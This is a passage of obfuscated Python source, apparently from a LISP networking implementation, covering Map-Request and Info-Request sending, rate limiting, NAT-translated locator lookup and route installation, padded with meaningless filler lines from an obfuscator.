packet = packet [ 0 : 7 ] + struct . pack ( "B" , oo0OOoOO0 ) + packet [ 8 : : ]
return ( packet )
if 75 - 75: O0 % Ii1I
if 47 - 47: OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
if 23 - 23: iII111i / iIii1I11I1II1
if 5 - 5: O0
if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
def lisp_mac_input ( packet ) :
return ( packet )
if 63 - 63: OOooOOo
if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
if 78 - 78: o0oOOo0O0Ooo . iII111i + O0 / I1ii11iIi11i + I1ii11iIi11i + II111iiii
if 96 - 96: iIii1I11I1II1 * II111iiii . iIii1I11I1II1
if 13 - 13: Ii1I - OoOoOO00 . Ii1I
if 7 - 7: Ii1I - I11i / I1ii11iIi11i + iII111i
if 47 - 47: I11i * IiII / oO0o - OoooooooOO . OoooooooOO / I11i
if 73 - 73: Ii1I . IiII % IiII
if 56 - 56: I1Ii111 + iII111i + iII111i
def lisp_rate_limit_map_request ( source , dest ) :
if ( lisp_last_map_request_sent == None ) : return ( False )
iIiooo = lisp_get_timestamp ( )
o0O0oO0 = iIiooo - lisp_last_map_request_sent
OOoOoOOo0O = ( o0O0oO0 < LISP_MAP_REQUEST_RATE_LIMIT )
if 46 - 46: OoO0O00 * I1Ii111 . O0
if ( OOoOoOOo0O ) :
if ( source != None ) : source = source . print_address ( )
dest = dest . print_address ( )
dprint ( "Rate-limiting Map-Request for {} -> {}" . format ( source , dest ) )
if 86 - 86: i11iIiiIii . Ii1I / OoOoOO00 / I11i * i1IIi
return ( OOoOoOOo0O )
if 40 - 40: o0oOOo0O0Ooo
if 33 - 33: i11iIiiIii + I1Ii111 % I1ii11iIi11i - I1Ii111 * OoO0O00
if 1 - 1: II111iiii / I1IiiI + II111iiii % II111iiii - I1Ii111
if 24 - 24: I11i / Oo0Ooo / i1IIi + IiII
if 10 - 10: I11i - IiII / II111iiii / oO0o % O0 / I1Ii111
if 91 - 91: oO0o * OoOoOO00 + O0 % Oo0Ooo
if 62 - 62: iIii1I11I1II1 - i11iIiiIii % iIii1I11I1II1 . ooOoO0o / OOooOOo * OoOoOO00
def lisp_send_map_request ( lisp_sockets , lisp_ephem_port , seid , deid , rloc ) :
global lisp_last_map_request_sent
if 45 - 45: OOooOOo - OOooOOo % iII111i - IiII . O0
if 6 - 6: iIii1I11I1II1 * II111iiii / O0 % IiII - I1Ii111
if 64 - 64: ooOoO0o
if 28 - 28: i11iIiiIii - IiII * I1ii11iIi11i + IiII * iII111i
if 75 - 75: o0oOOo0O0Ooo * OoOoOO00 % I1ii11iIi11i + OOooOOo . II111iiii
if 12 - 12: ooOoO0o
o0O0oOO0o0 = i1iIi1IIIiI1 = None
if ( rloc ) :
o0O0oOO0o0 = rloc . rloc
i1iIi1IIIiI1 = rloc . translated_port if lisp_i_am_rtr else LISP_DATA_PORT
if 5 - 5: OoO0O00 / I1Ii111
if 78 - 78: OoOoOO00 / IiII
if 92 - 92: OoOoOO00 / I11i / I1Ii111
if 2 - 2: IiII - iIii1I11I1II1
if 54 - 54: i11iIiiIii . Ii1I % I1IiiI . I1Ii111 . OoooooooOO
I1I1I1i1II1 , i1iI1IIIi1iIii1 , OO0oo00oOO = lisp_myrlocs
if ( I1I1I1i1II1 == None ) :
lprint ( "Suppress sending Map-Request, IPv4 RLOC not found" )
return
if 64 - 64: OoOoOO00
if ( i1iI1IIIi1iIii1 == None and o0O0oOO0o0 != None and o0O0oOO0o0 . is_ipv6 ( ) ) :
lprint ( "Suppress sending Map-Request, IPv6 RLOC not found" )
return
if 20 - 20: OoOoOO00 / O0 * OOooOOo % I11i + OoO0O00 + o0oOOo0O0Ooo
if 51 - 51: Ii1I - OoOoOO00 / i11iIiiIii + O0
oOOooOoo0O = lisp_map_request ( )
oOOooOoo0O . record_count = 1
oOOooOoo0O . nonce = lisp_get_control_nonce ( )
oOOooOoo0O . rloc_probe = ( o0O0oOO0o0 != None )
if 71 - 71: ooOoO0o
if 35 - 35: OoOoOO00
if 55 - 55: iII111i - o0oOOo0O0Ooo + IiII * II111iiii
if 6 - 6: I1Ii111 / i1IIi / IiII . o0oOOo0O0Ooo
if 69 - 69: ooOoO0o - OoOoOO00 . I1IiiI . I11i + OoOoOO00 / i11iIiiIii
if 20 - 20: OoO0O00 . OoooooooOO - ooOoO0o . I11i / Oo0Ooo
if 89 - 89: iIii1I11I1II1 . ooOoO0o
if ( rloc ) : rloc . last_rloc_probe_nonce = oOOooOoo0O . nonce
if 82 - 82: OoOoOO00 - II111iiii . OoO0O00 * ooOoO0o
o0000o0o = deid . is_multicast_address ( )
if ( o0000o0o ) :
oOOooOoo0O . target_eid = seid
oOOooOoo0O . target_group = deid
else :
oOOooOoo0O . target_eid = deid
if 78 - 78: OoOoOO00 % oO0o
if 39 - 39: iIii1I11I1II1
if 72 - 72: II111iiii + I1Ii111 / Ii1I * iIii1I11I1II1
if 95 - 95: OoooooooOO + OOooOOo + II111iiii + IiII + OoO0O00
if 86 - 86: II111iiii / iII111i - I1ii11iIi11i
if 65 - 65: I1ii11iIi11i + OoOoOO00
if 43 - 43: O0 + I11i % II111iiii
if 56 - 56: IiII + Oo0Ooo . IiII % iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 70 - 70: ooOoO0o / i1IIi - I11i - i11iIiiIii
if ( oOOooOoo0O . rloc_probe == False ) :
o00o0oOo0o0O = lisp_get_signature_eid ( )
if ( o00o0oOo0o0O ) :
oOOooOoo0O . signature_eid . copy_address ( o00o0oOo0o0O . eid )
oOOooOoo0O . privkey_filename = "./lisp-sig.pem"
if 79 - 79: OoO0O00 - OoooooooOO % iII111i . O0
if 93 - 93: I1Ii111
if 3 - 3: OoO0O00 / IiII - oO0o / oO0o
if 50 - 50: II111iiii + OoOoOO00
if 17 - 17: ooOoO0o + I1ii11iIi11i
if 34 - 34: Ii1I / II111iiii + OoOoOO00 . II111iiii + OoooooooOO * o0oOOo0O0Ooo
if ( seid == None or o0000o0o ) :
oOOooOoo0O . source_eid . afi = LISP_AFI_NONE
else :
oOOooOoo0O . source_eid = seid
if 48 - 48: O0
if 99 - 99: II111iiii * oO0o / I1ii11iIi11i - i1IIi
if 84 - 84: i11iIiiIii . OoooooooOO
if 69 - 69: I1Ii111 * II111iiii % I1Ii111 * i11iIiiIii . ooOoO0o / Oo0Ooo
if 5 - 5: Ii1I
if 19 - 19: oO0o
if 61 - 61: OoOoOO00 + iIii1I11I1II1 / I1ii11iIi11i - i1IIi
if 11 - 11: oO0o * o0oOOo0O0Ooo . I1IiiI
if 12 - 12: I1IiiI % OoO0O00 / I1Ii111 / O0 % o0oOOo0O0Ooo
if 1 - 1: OoOoOO00 / I11i
if 43 - 43: o0oOOo0O0Ooo - i1IIi / Ii1I . OoOoOO00 + i11iIiiIii
if 69 - 69: i11iIiiIii - iIii1I11I1II1
if ( o0O0oOO0o0 != None and lisp_nat_traversal and lisp_i_am_rtr == False ) :
if ( o0O0oOO0o0 . is_private_address ( ) == False ) :
I1I1I1i1II1 = lisp_get_any_translated_rloc ( )
if 40 - 40: I1IiiI / oO0o + ooOoO0o
if ( I1I1I1i1II1 == None ) :
lprint ( "Suppress sending Map-Request, translated RLOC not found" )
return
if 100 - 100: OoOoOO00 % iII111i * ooOoO0o . O0
if 37 - 37: I1ii11iIi11i
if 24 - 24: O0 . I1Ii111 * i11iIiiIii
if 84 - 84: ooOoO0o / I1ii11iIi11i - o0oOOo0O0Ooo . OoooooooOO * iIii1I11I1II1
if 16 - 16: I11i % O0
if 56 - 56: Ii1I * OoOoOO00 . i1IIi
if 15 - 15: I1Ii111
if 64 - 64: OOooOOo * Oo0Ooo
if ( o0O0oOO0o0 == None or o0O0oOO0o0 . is_ipv4 ( ) ) :
if ( lisp_nat_traversal and o0O0oOO0o0 == None ) :
OO0O = lisp_get_any_translated_rloc ( )
if ( OO0O != None ) : I1I1I1i1II1 = OO0O
if 28 - 28: iII111i
oOOooOoo0O . itr_rlocs . append ( I1I1I1i1II1 )
if 18 - 18: I1Ii111
if ( o0O0oOO0o0 == None or o0O0oOO0o0 . is_ipv6 ( ) ) :
if ( i1iI1IIIi1iIii1 == None or i1iI1IIIi1iIii1 . is_ipv6_link_local ( ) ) :
i1iI1IIIi1iIii1 = None
else :
oOOooOoo0O . itr_rloc_count = 1 if ( o0O0oOO0o0 == None ) else 0
oOOooOoo0O . itr_rlocs . append ( i1iI1IIIi1iIii1 )
if 29 - 29: i1IIi - I1IiiI / i1IIi
if 64 - 64: IiII
if 69 - 69: OOooOOo . I1IiiI
if 11 - 11: I1Ii111 * I1IiiI - I1Ii111 / iII111i
if 22 - 22: iII111i % I11i % O0 - I11i
if 71 - 71: I1Ii111 / II111iiii - OoooooooOO % i1IIi + OoOoOO00 % OoooooooOO
if 52 - 52: Ii1I . OoOoOO00 / o0oOOo0O0Ooo / iII111i
if 83 - 83: OoO0O00 - Oo0Ooo + I1Ii111 . I1IiiI
if 78 - 78: I11i / ooOoO0o . OoOoOO00 * i1IIi
if ( o0O0oOO0o0 != None and oOOooOoo0O . itr_rlocs != [ ] ) :
O00o00O0OO0 = oOOooOoo0O . itr_rlocs [ 0 ]
else :
if ( deid . is_ipv4 ( ) ) :
O00o00O0OO0 = I1I1I1i1II1
elif ( deid . is_ipv6 ( ) ) :
O00o00O0OO0 = i1iI1IIIi1iIii1
else :
O00o00O0OO0 = I1I1I1i1II1
if 15 - 15: i1IIi . II111iiii * OoOoOO00 / Oo0Ooo
if 99 - 99: iII111i - o0oOOo0O0Ooo / O0
if 97 - 97: iIii1I11I1II1 * I1Ii111
if 39 - 39: I1Ii111 . II111iiii
if 94 - 94: OoO0O00 - OoO0O00 + iIii1I11I1II1 + O0 * oO0o
if 9 - 9: Ii1I * Oo0Ooo / oO0o / Ii1I
ii1i1II = oOOooOoo0O . encode ( o0O0oOO0o0 , i1iIi1IIIiI1 )
oOOooOoo0O . print_map_request ( )
if 34 - 34: I1IiiI
if 56 - 56: Ii1I
if 71 - 71: O0 / i1IIi
if 20 - 20: OOooOOo . iIii1I11I1II1 - I1Ii111 . i1IIi
if 82 - 82: oO0o * i11iIiiIii % o0oOOo0O0Ooo % IiII - I11i - OoO0O00
if 24 - 24: oO0o . II111iiii + OoO0O00 * I1ii11iIi11i / oO0o
if ( o0O0oOO0o0 != None ) :
if ( rloc . is_rloc_translated ( ) ) :
oOOo0O0O = lisp_get_nat_info ( o0O0oOO0o0 , rloc . rloc_name )
if 86 - 86: I1Ii111 + I1ii11iIi11i
if 63 - 63: ooOoO0o - i11iIiiIii . o0oOOo0O0Ooo - i1IIi - IiII
if 32 - 32: I1Ii111 / iIii1I11I1II1 + oO0o % I11i * OoooooooOO
if 69 - 69: OOooOOo
if ( oOOo0O0O == None ) :
O0OooO0oo = rloc . rloc . print_address_no_iid ( )
II1IIiIiiI1iI = "gleaned-{}" . format ( O0OooO0oo )
iIiiI11II11 = rloc . translated_port
oOOo0O0O = lisp_nat_info ( O0OooO0oo , II1IIiIiiI1iI , iIiiI11II11 )
if 9 - 9: i11iIiiIii * Oo0Ooo
lisp_encapsulate_rloc_probe ( lisp_sockets , o0O0oOO0o0 , oOOo0O0O ,
ii1i1II )
return
if 33 - 33: oO0o / ooOoO0o
if 92 - 92: O0 . Oo0Ooo - Ii1I * I1IiiI * Oo0Ooo * iII111i
oOo0O = o0O0oOO0o0 . print_address_no_iid ( )
oO00o0oOoo = lisp_convert_4to6 ( oOo0O )
lisp_send ( lisp_sockets , oO00o0oOoo , LISP_CTRL_PORT , ii1i1II )
return
if 78 - 78: Ii1I * iIii1I11I1II1 - Ii1I - I1ii11iIi11i * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO / i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: OOooOOo * O0 * II111iiii % OoOoOO00
if 12 - 12: Oo0Ooo . o0oOOo0O0Ooo - i1IIi - oO0o % IiII . I11i
if 17 - 17: i1IIi % OoO0O00 + i11iIiiIii % I1Ii111 * ooOoO0o . I1ii11iIi11i
oo00ooOo = None if lisp_i_am_rtr else seid
if ( lisp_decent_pull_xtr_configured ( ) ) :
ii1 = lisp_get_decent_map_resolver ( deid )
else :
ii1 = lisp_get_map_resolver ( None , oo00ooOo )
if 92 - 92: I1ii11iIi11i * I1IiiI % i11iIiiIii + oO0o * I1ii11iIi11i % OOooOOo
if ( ii1 == None ) :
lprint ( "Cannot find Map-Resolver for source-EID {}" . format ( green ( seid . print_address ( ) , False ) ) )
if 96 - 96: I1Ii111 + i1IIi % O0 * I1IiiI * I11i . Ii1I
return
if 71 - 71: i1IIi . I1IiiI
ii1 . last_used = lisp_get_timestamp ( )
ii1 . map_requests_sent += 1
if ( ii1 . last_nonce == 0 ) : ii1 . last_nonce = oOOooOoo0O . nonce
if 81 - 81: O0
if 89 - 89: oO0o % OoOoOO00 + Oo0Ooo
if 16 - 16: Ii1I . I1Ii111
if 38 - 38: I1IiiI / II111iiii * OoOoOO00 / I1Ii111
if ( seid == None ) : seid = O00o00O0OO0
lisp_send_ecm ( lisp_sockets , ii1i1II , seid , lisp_ephem_port , deid ,
ii1 . map_resolver )
if 80 - 80: I1ii11iIi11i / ooOoO0o * ooOoO0o . Oo0Ooo
if 44 - 44: Ii1I * i1IIi % OoOoOO00 . OoOoOO00
if 16 - 16: Oo0Ooo / i1IIi / iIii1I11I1II1 / iIii1I11I1II1 % o0oOOo0O0Ooo / I1ii11iIi11i
if 11 - 11: I1IiiI
lisp_last_map_request_sent = lisp_get_timestamp ( )
if 45 - 45: OOooOOo / i1IIi * IiII * I1Ii111
if 34 - 34: ooOoO0o / iIii1I11I1II1 . iII111i
if 91 - 91: OoO0O00
if 8 - 8: oO0o
ii1 . resolve_dns_name ( )
return
if 96 - 96: IiII
if 37 - 37: Ii1I % i11iIiiIii + iIii1I11I1II1 % Oo0Ooo - iIii1I11I1II1
if 26 - 26: o0oOOo0O0Ooo . i1IIi
if 62 - 62: IiII * I1ii11iIi11i % iIii1I11I1II1 / II111iiii - OoO0O00
if 52 - 52: iII111i . I11i - I11i + oO0o + iIii1I11I1II1
if 83 - 83: I11i * iIii1I11I1II1 + OoOoOO00
if 81 - 81: ooOoO0o * OOooOOo / OoO0O00 + I1ii11iIi11i % I1Ii111
if 37 - 37: i11iIiiIii - OoooooooOO - OoOoOO00 * oO0o / Ii1I
def lisp_send_info_request ( lisp_sockets , dest , port , device_name ) :
if 100 - 100: II111iiii / Oo0Ooo / iII111i / OOooOOo
if 100 - 100: iIii1I11I1II1
if 50 - 50: I1Ii111 / ooOoO0o * I11i
if 53 - 53: II111iiii . IiII
ii1iII111i = lisp_info ( )
ii1iII111i . nonce = lisp_get_control_nonce ( )
if ( device_name ) : ii1iII111i . hostname += "-" + device_name
if 80 - 80: IiII - i11iIiiIii % I11i
oOo0O = dest . print_address_no_iid ( )
if 5 - 5: OoooooooOO
if 5 - 5: iII111i + oO0o % O0 . OoooooooOO + i1IIi
if 55 - 55: I1ii11iIi11i
if 34 - 34: OoO0O00 * iIii1I11I1II1 . iIii1I11I1II1
if 39 - 39: o0oOOo0O0Ooo
if 29 - 29: Oo0Ooo . Oo0Ooo * OoO0O00 % Ii1I - ooOoO0o
if 67 - 67: I1IiiI % O0 + I1IiiI * I1Ii111 * OoOoOO00 * II111iiii
if 79 - 79: I1IiiI
if 37 - 37: I1Ii111 + Ii1I
if 50 - 50: i11iIiiIii
if 57 - 57: O0 * i1IIi - I1IiiI
if 48 - 48: IiII / iIii1I11I1II1
if 20 - 20: oO0o / OoooooooOO
if 95 - 95: Oo0Ooo . i11iIiiIii
if 50 - 50: iII111i . i11iIiiIii - i1IIi
if 24 - 24: i11iIiiIii % iII111i . oO0o
iiIIiI11I = False
if ( device_name ) :
Ii1iIiIiIIIiI = lisp_get_host_route_next_hop ( oOo0O )
if 14 - 14: OoO0O00 * I1IiiI
if 78 - 78: I1IiiI / iII111i - ooOoO0o - i11iIiiIii
if 39 - 39: i11iIiiIii / oO0o
if 71 - 71: I1Ii111 * iIii1I11I1II1 - I1Ii111
if 87 - 87: I1IiiI / Ii1I
if 54 - 54: OoooooooOO / Ii1I
if 26 - 26: o0oOOo0O0Ooo + OoO0O00
if 59 - 59: Ii1I * IiII
if 64 - 64: ooOoO0o . Oo0Ooo - OoOoOO00
if ( port == LISP_CTRL_PORT and Ii1iIiIiIIIiI != None ) :
while ( True ) :
time . sleep ( .01 )
Ii1iIiIiIIIiI = lisp_get_host_route_next_hop ( oOo0O )
if ( Ii1iIiIiIIIiI == None ) : break
if 66 - 66: OoOoOO00
if 83 - 83: OOooOOo . IiII
if 98 - 98: i11iIiiIii
OoOoo0Ooo0O0o = lisp_get_default_route_next_hops ( )
for OO0oo00oOO , I1ii1I1II11II in OoOoo0Ooo0O0o :
if ( OO0oo00oOO != device_name ) : continue
if 48 - 48: oO0o + i11iIiiIii % i11iIiiIii % i11iIiiIii % OOooOOo * I11i
if 63 - 63: OoO0O00 % OoO0O00 % OOooOOo - i11iIiiIii + Oo0Ooo + iIii1I11I1II1
if 44 - 44: OoO0O00
if 59 - 59: iII111i
if 7 - 7: o0oOOo0O0Ooo * OoooooooOO - Ii1I * II111iiii % I1Ii111
if 82 - 82: OoOoOO00 - OoOoOO00 + iIii1I11I1II1 + o0oOOo0O0Ooo + IiII - o0oOOo0O0Ooo
if ( Ii1iIiIiIIIiI != I1ii1I1II11II ) :
if ( Ii1iIiIiIIIiI != None ) :
lisp_install_host_route ( oOo0O , Ii1iIiIiIIIiI , False )
if 65 - 65: I1Ii111 + OOooOOo
lisp_install_host_route ( oOo0O , I1ii1I1II11II , True )
iiIIiI11I = True
if 97 - 97: oO0o % OoOoOO00 * oO0o % II111iiii + iIii1I11I1II1
break
if 11 - 11: ooOoO0o . o0oOOo0O0Ooo
if 94 - 94: ooOoO0o . oO0o * OoooooooOO % oO0o
if 77 - 77: ooOoO0o % I1IiiI
if 26 - 26: o0oOOo0O0Ooo
if 72 - 72: I1IiiI
if 90 - 90: ooOoO0o
ii1i1II = ii1iII111i . encode ( )
ii1iII111i . print_info ( )
if 67 - 67: iIii1I11I1II1 + i1IIi * I1IiiI * OoooooooOO
if 23 - 23: IiII
if 32 - 32: OoOoOO00 - iII111i % oO0o / I1ii11iIi11i - o0oOOo0O0Ooo
if 52 - 52: Ii1I / OoooooooOO % i11iIiiIii + iII111i
O0oOO = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
O0oOO = bold ( O0oOO , False )
iIiiI11II11 = bold ( "{}" . format ( port ) , False )
O0o00O0Oo0 = red ( oOo0O , False )
O0O0 = "RTR " if port == LISP_DATA_PORT else "MS "
lprint ( "Send Info-Request to {}{}, port {} {}" . format ( O0O0 , O0o00O0Oo0 , iIiiI11II11 , O0oOO ) )
if 65 - 65: OOooOOo * o0oOOo0O0Ooo - I1Ii111 % O0 / I1ii11iIi11i + O0
if 97 - 97: II111iiii + i11iIiiIii + OoooooooOO . iII111i
if 11 - 11: IiII + iII111i + o0oOOo0O0Ooo % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . o0oOOo0O0Ooo / Ii1I . i11iIiiIii - IiII
if 25 - 25: iII111i - OoOoOO00
if 37 - 37: OoOoOO00 % o0oOOo0O0Ooo . oO0o % i11iIiiIii
if ( port == LISP_CTRL_PORT ) :
lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , ii1i1II )
else :
iIIIIII = lisp_data_header ( )
iIIIIII . instance_id ( 0xffffff )
iIIIIII = iIIIIII . encode ( )
if ( iIIIIII ) :
ii1i1II = iIIIIII + ii1i1II
if 42 - 42: OOooOOo - IiII + ooOoO0o / O0 * OOooOOo . OoOoOO00
if 42 - 42: OoO0O00 % oO0o / I1ii11iIi11i
if 34 - 34: OOooOOo % OoO0O00 - o0oOOo0O0Ooo * iIii1I11I1II1 - I11i / OoooooooOO
if 87 - 87: I1ii11iIi11i - I1Ii111 / OOooOOo * II111iiii
if 15 - 15: Ii1I / OoOoOO00 - OoO0O00 - iIii1I11I1II1 + OoOoOO00 - I11i
if 10 - 10: I1ii11iIi11i
if 6 - 6: OoO0O00 + OoO0O00 * OOooOOo / IiII % ooOoO0o - I1IiiI
if 17 - 17: II111iiii
if 66 - 66: O0 % OoOoOO00 + IiII % I1Ii111
lisp_send ( lisp_sockets , dest , LISP_DATA_PORT , ii1i1II )
if 94 - 94: OoOoOO00 / OoooooooOO % Ii1I * i11iIiiIii
if 95 - 95: iIii1I11I1II1 % OOooOOo % O0
if 93 - 93: I1ii11iIi11i
if 61 - 61: o0oOOo0O0Ooo * ooOoO0o
if 82 - 82: O0 * O0 % I1IiiI / o0oOOo0O0Ooo
if 46 - 46: IiII . O0 . I11i % I1ii11iIi11i * oO0o - oO0o
if 92 - 92: I1IiiI - I1IiiI
if ( iiIIiI11I ) :
lisp_install_host_route ( oOo0O , None , False )
if ( Ii1iIiIiIIIiI != None ) : lisp_install_host_route ( oOo0O , Ii1iIiIiIIIiI , True )
if 28 - 28: oO0o * iII111i + IiII
return
if 73 - 73: OoooooooOO
if 45 - 45: IiII + I1IiiI * I1Ii111
if 82 - 82: OOooOOo / I11i % Ii1I * OoOoOO00
if 88 - 88: o0oOOo0O0Ooo % OoO0O00
if 30 - 30: II111iiii / Oo0Ooo % Oo0Ooo + O0 / iIii1I11I1II1 . OoO0O00
if 43 - 43: I1IiiI % OoOoOO00 * O0 + o0oOOo0O0Ooo
if 97 - 97: iIii1I11I1II1 + O0
def lisp_process_info_request ( lisp_sockets , packet , addr_str , sport , rtr_list ) :
if 41 - 41: OoOoOO00 - II111iiii
if 46 - 46: OOooOOo
if 73 - 73: iII111i - IiII + II111iiii
if 58 - 58: Oo0Ooo % I1IiiI
ii1iII111i = lisp_info ( )
packet = ii1iII111i . decode ( packet )
if ( packet == None ) : return
ii1iII111i . print_info ( )
if 78 - 78: iII111i / iIii1I11I1II1 * IiII . ooOoO0o / I1Ii111 % I11i
if 14 - 14: II111iiii % iIii1I11I1II1 - I1IiiI % i11iIiiIii . OOooOOo * I1ii11iIi11i
if 12 - 12: I1ii11iIi11i % I1ii11iIi11i . OoO0O00 . OoOoOO00
if 73 - 73: I1ii11iIi11i * i1IIi * Oo0Ooo / O0
if 1 - 1: iII111i * OOooOOo + II111iiii / Ii1I . I1ii11iIi11i
ii1iII111i . info_reply = True
ii1iII111i . global_etr_rloc . store_address ( addr_str )
ii1iII111i . etr_port = sport
if 61 - 61: oO0o % OoOoOO00 % ooOoO0o . I1Ii111 / OoO0O00
if 21 - 21: IiII
if 15 - 15: OoOoOO00 % O0 - OOooOOo - oO0o . iII111i . OoO0O00
if 52 - 52: II111iiii * o0oOOo0O0Ooo
if 95 - 95: I1Ii111 - OoooooooOO
if ( ii1iII111i . hostname != None ) :
ii1iII111i . private_etr_rloc . afi = LISP_AFI_NAME
ii1iII111i . private_etr_rloc . store_address ( ii1iII111i . hostname )
if 99 - 99: OoooooooOO % IiII . I11i + OoooooooOO
if 57 - 57: Ii1I / I1IiiI * i1IIi
if ( rtr_list != None ) : ii1iII111i . rtr_list = rtr_list
packet = ii1iII111i . encode ( )
ii1iII111i . print_info ( )
if 21 - 21: I11i . O0 * OoooooooOO + ooOoO0o * oO0o % i11iIiiIii
if 30 - 30: ooOoO0o * I1Ii111 + OoO0O00
if 30 - 30: Ii1I / iII111i * Ii1I
if 11 - 11: OoOoOO00 - OoOoOO00 % oO0o
if 3 - 3: I1IiiI - OoooooooOO % iIii1I11I1II1 + I1Ii111 + OoOoOO00
lprint ( "Send Info-Reply to {}" . format ( red ( addr_str , False ) ) )
oO00o0oOoo = lisp_convert_4to6 ( addr_str )
lisp_send ( lisp_sockets , oO00o0oOoo , sport , packet )
if 71 - 71: i1IIi % O0 % ooOoO0o
if 24 - 24: O0
if 88 - 88: OoooooooOO / Oo0Ooo / oO0o
if 99 - 99: I1Ii111 % OoOoOO00 % IiII - Ii1I
if 79 - 79: ooOoO0o + Oo0Ooo
OOoO0O0Ooo = lisp_info_source ( ii1iII111i . hostname , addr_str , sport )
OOoO0O0Ooo . cache_address_for_info_source ( )
return
if 38 - 38: II111iiii
if 44 - 44: OOooOOo + i11iIiiIii - I1Ii111 + ooOoO0o
if 92 - 92: O0 . iIii1I11I1II1 % iIii1I11I1II1 % OoO0O00 - i11iIiiIii - iII111i
if 76 - 76: OoO0O00 . II111iiii / I1ii11iIi11i
if 15 - 15: OoOoOO00 . O0 + iII111i + I1IiiI . ooOoO0o + iIii1I11I1II1
if 2 - 2: I11i
if 52 - 52: i11iIiiIii / oO0o / IiII
if 84 - 84: I11i . oO0o + ooOoO0o
def lisp_get_signature_eid ( ) :
for o00o0oOo0o0O in lisp_db_list :
if ( o00o0oOo0o0O . signature_eid ) : return ( o00o0oOo0o0O )
if 75 - 75: I1Ii111
return ( None )
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
if 22 - 22: O0 % I11i + OoO0O00 - iII111i + I1IiiI . O0
if 73 - 73: ooOoO0o + O0 - I11i . I1IiiI + OOooOOo
if 36 - 36: I11i % OoO0O00 * OoOoOO00 - I1Ii111
if 16 - 16: ooOoO0o % OOooOOo . OoO0O00 % II111iiii . iIii1I11I1II1
if 21 - 21: oO0o + II111iiii / OoOoOO00 * I11i
if 90 - 90: OoOoOO00 % OoOoOO00 + I11i
if 70 - 70: I1IiiI . ooOoO0o / I11i / OoO0O00
def lisp_get_any_translated_port ( ) :
for o00o0oOo0o0O in lisp_db_list :
for IiIIIi in o00o0oOo0o0O . rloc_set :
if ( IiIIIi . translated_rloc . is_null ( ) ) : continue
return ( IiIIIi . translated_port )
if 40 - 40: oO0o % iIii1I11I1II1 * iIii1I11I1II1 / Oo0Ooo * OoO0O00
if 61 - 61: OOooOOo
return ( None )
if 80 - 80: I1ii11iIi11i
if 6 - 6: I1ii11iIi11i + OOooOOo % ooOoO0o
if 65 - 65: iIii1I11I1II1 % i1IIi / I1IiiI / oO0o % ooOoO0o / I11i
if 2 - 2: I1ii11iIi11i
if 90 - 90: II111iiii * I1Ii111 . ooOoO0o - I1ii11iIi11i % I11i * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1
if 76 - 76: i11iIiiIii % I1IiiI / I11i
if 42 - 42: o0oOOo0O0Ooo . I1IiiI + I11i . OoOoOO00 - O0 / Ii1I
if 66 - 66: IiII + OoOoOO00 + I1IiiI + i1IIi + OoooooooOO % I1IiiI
def lisp_get_any_translated_rloc ( ) :
for o00o0oOo0o0O in lisp_db_list :
for IiIIIi in o00o0oOo0o0O . rloc_set :
if ( IiIIIi . translated_rloc . is_null ( ) ) : continue
return ( IiIIIi . translated_rloc )
if 80 - 80: iII111i / O0 % OoooooooOO / Oo0Ooo
if 75 - 75: ooOoO0o
return ( None )
if 72 - 72: oO0o . OoooooooOO % ooOoO0o % OoO0O00 * oO0o * OoO0O00
if 14 - 14: I11i / I11i
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
if 93 - 93: oO0o / ooOoO0o - I1Ii111
if 70 - 70: OOooOOo / Ii1I - ooOoO0o + OoooooooOO / OoO0O00 - i11iIiiIii
if 26 - 26: O0 + Oo0Ooo
if 30 - 30: IiII
def lisp_get_all_translated_rlocs ( ) :
i1I1i1Iiiiiii = [ ]
for o00o0oOo0o0O in lisp_db_list :
for IiIIIi in o00o0oOo0o0O . rloc_set :
if ( IiIIIi . is_rloc_translated ( ) == False ) : continue
O0o00o000oO = IiIIIi . translated_rloc . print_address_no_iid ( )
i1I1i1Iiiiiii . append ( O0o00o000oO )
if 19 - 19: Ii1I . I1IiiI - i1IIi * ooOoO0o . iIii1I11I1II1
if 87 - 87: ooOoO0o % I1ii11iIi11i . I1IiiI
return ( i1I1i1Iiiiiii )
if 42 - 42: iII111i % i11iIiiIii % o0oOOo0O0Ooo . O0 % iII111i
if 72 - 72: Oo0Ooo . Oo0Ooo . IiII . Oo0Ooo
if 80 - 80: I1Ii111 + IiII + O0 - I1Ii111 . iIii1I11I1II1
if 53 - 53: OoO0O00 / i11iIiiIii * I1Ii111
if 62 - 62: oO0o / Oo0Ooo / IiII + I11i * ooOoO0o
if 84 - 84: ooOoO0o + OoOoOO00 * I1ii11iIi11i % OoooooooOO . O0
if 27 - 27: OoO0O00 * OoooooooOO - II111iiii / o0oOOo0O0Ooo
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
def lisp_update_default_routes ( map_resolver , iid , rtr_list ) :
iiIII1 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 83 - 83: OOooOOo . ooOoO0o / IiII
O0O0OOOo0 = { }
for OooO0ooO0o0OO in rtr_list :
if ( OooO0ooO0o0OO == None ) : continue
O0o00o000oO = rtr_list [ OooO0ooO0o0OO ]
if ( iiIII1 and O0o00o000oO . is_private_address ( ) ) : continue
O0O0OOOo0 [ OooO0ooO0o0OO ] = O0o00o000oO
if 73 - 73: O0 - I1IiiI + I1Ii111 . OoOoOO00 . IiII - OOooOOo
rtr_list = O0O0OOOo0
if 13 - 13: i11iIiiIii
IIi1I1Ii = [ ]
for oO0oO00 in [ LISP_AFI_IPV4 , LISP_AFI_IPV6 , LISP_AFI_MAC ] :
if ( oO0oO00 == LISP_AFI_MAC and lisp_l2_overlay == False ) : break
if 37 - 37: ooOoO0o + OOooOOo / I1IiiI + ooOoO0o + I11i - iII111i
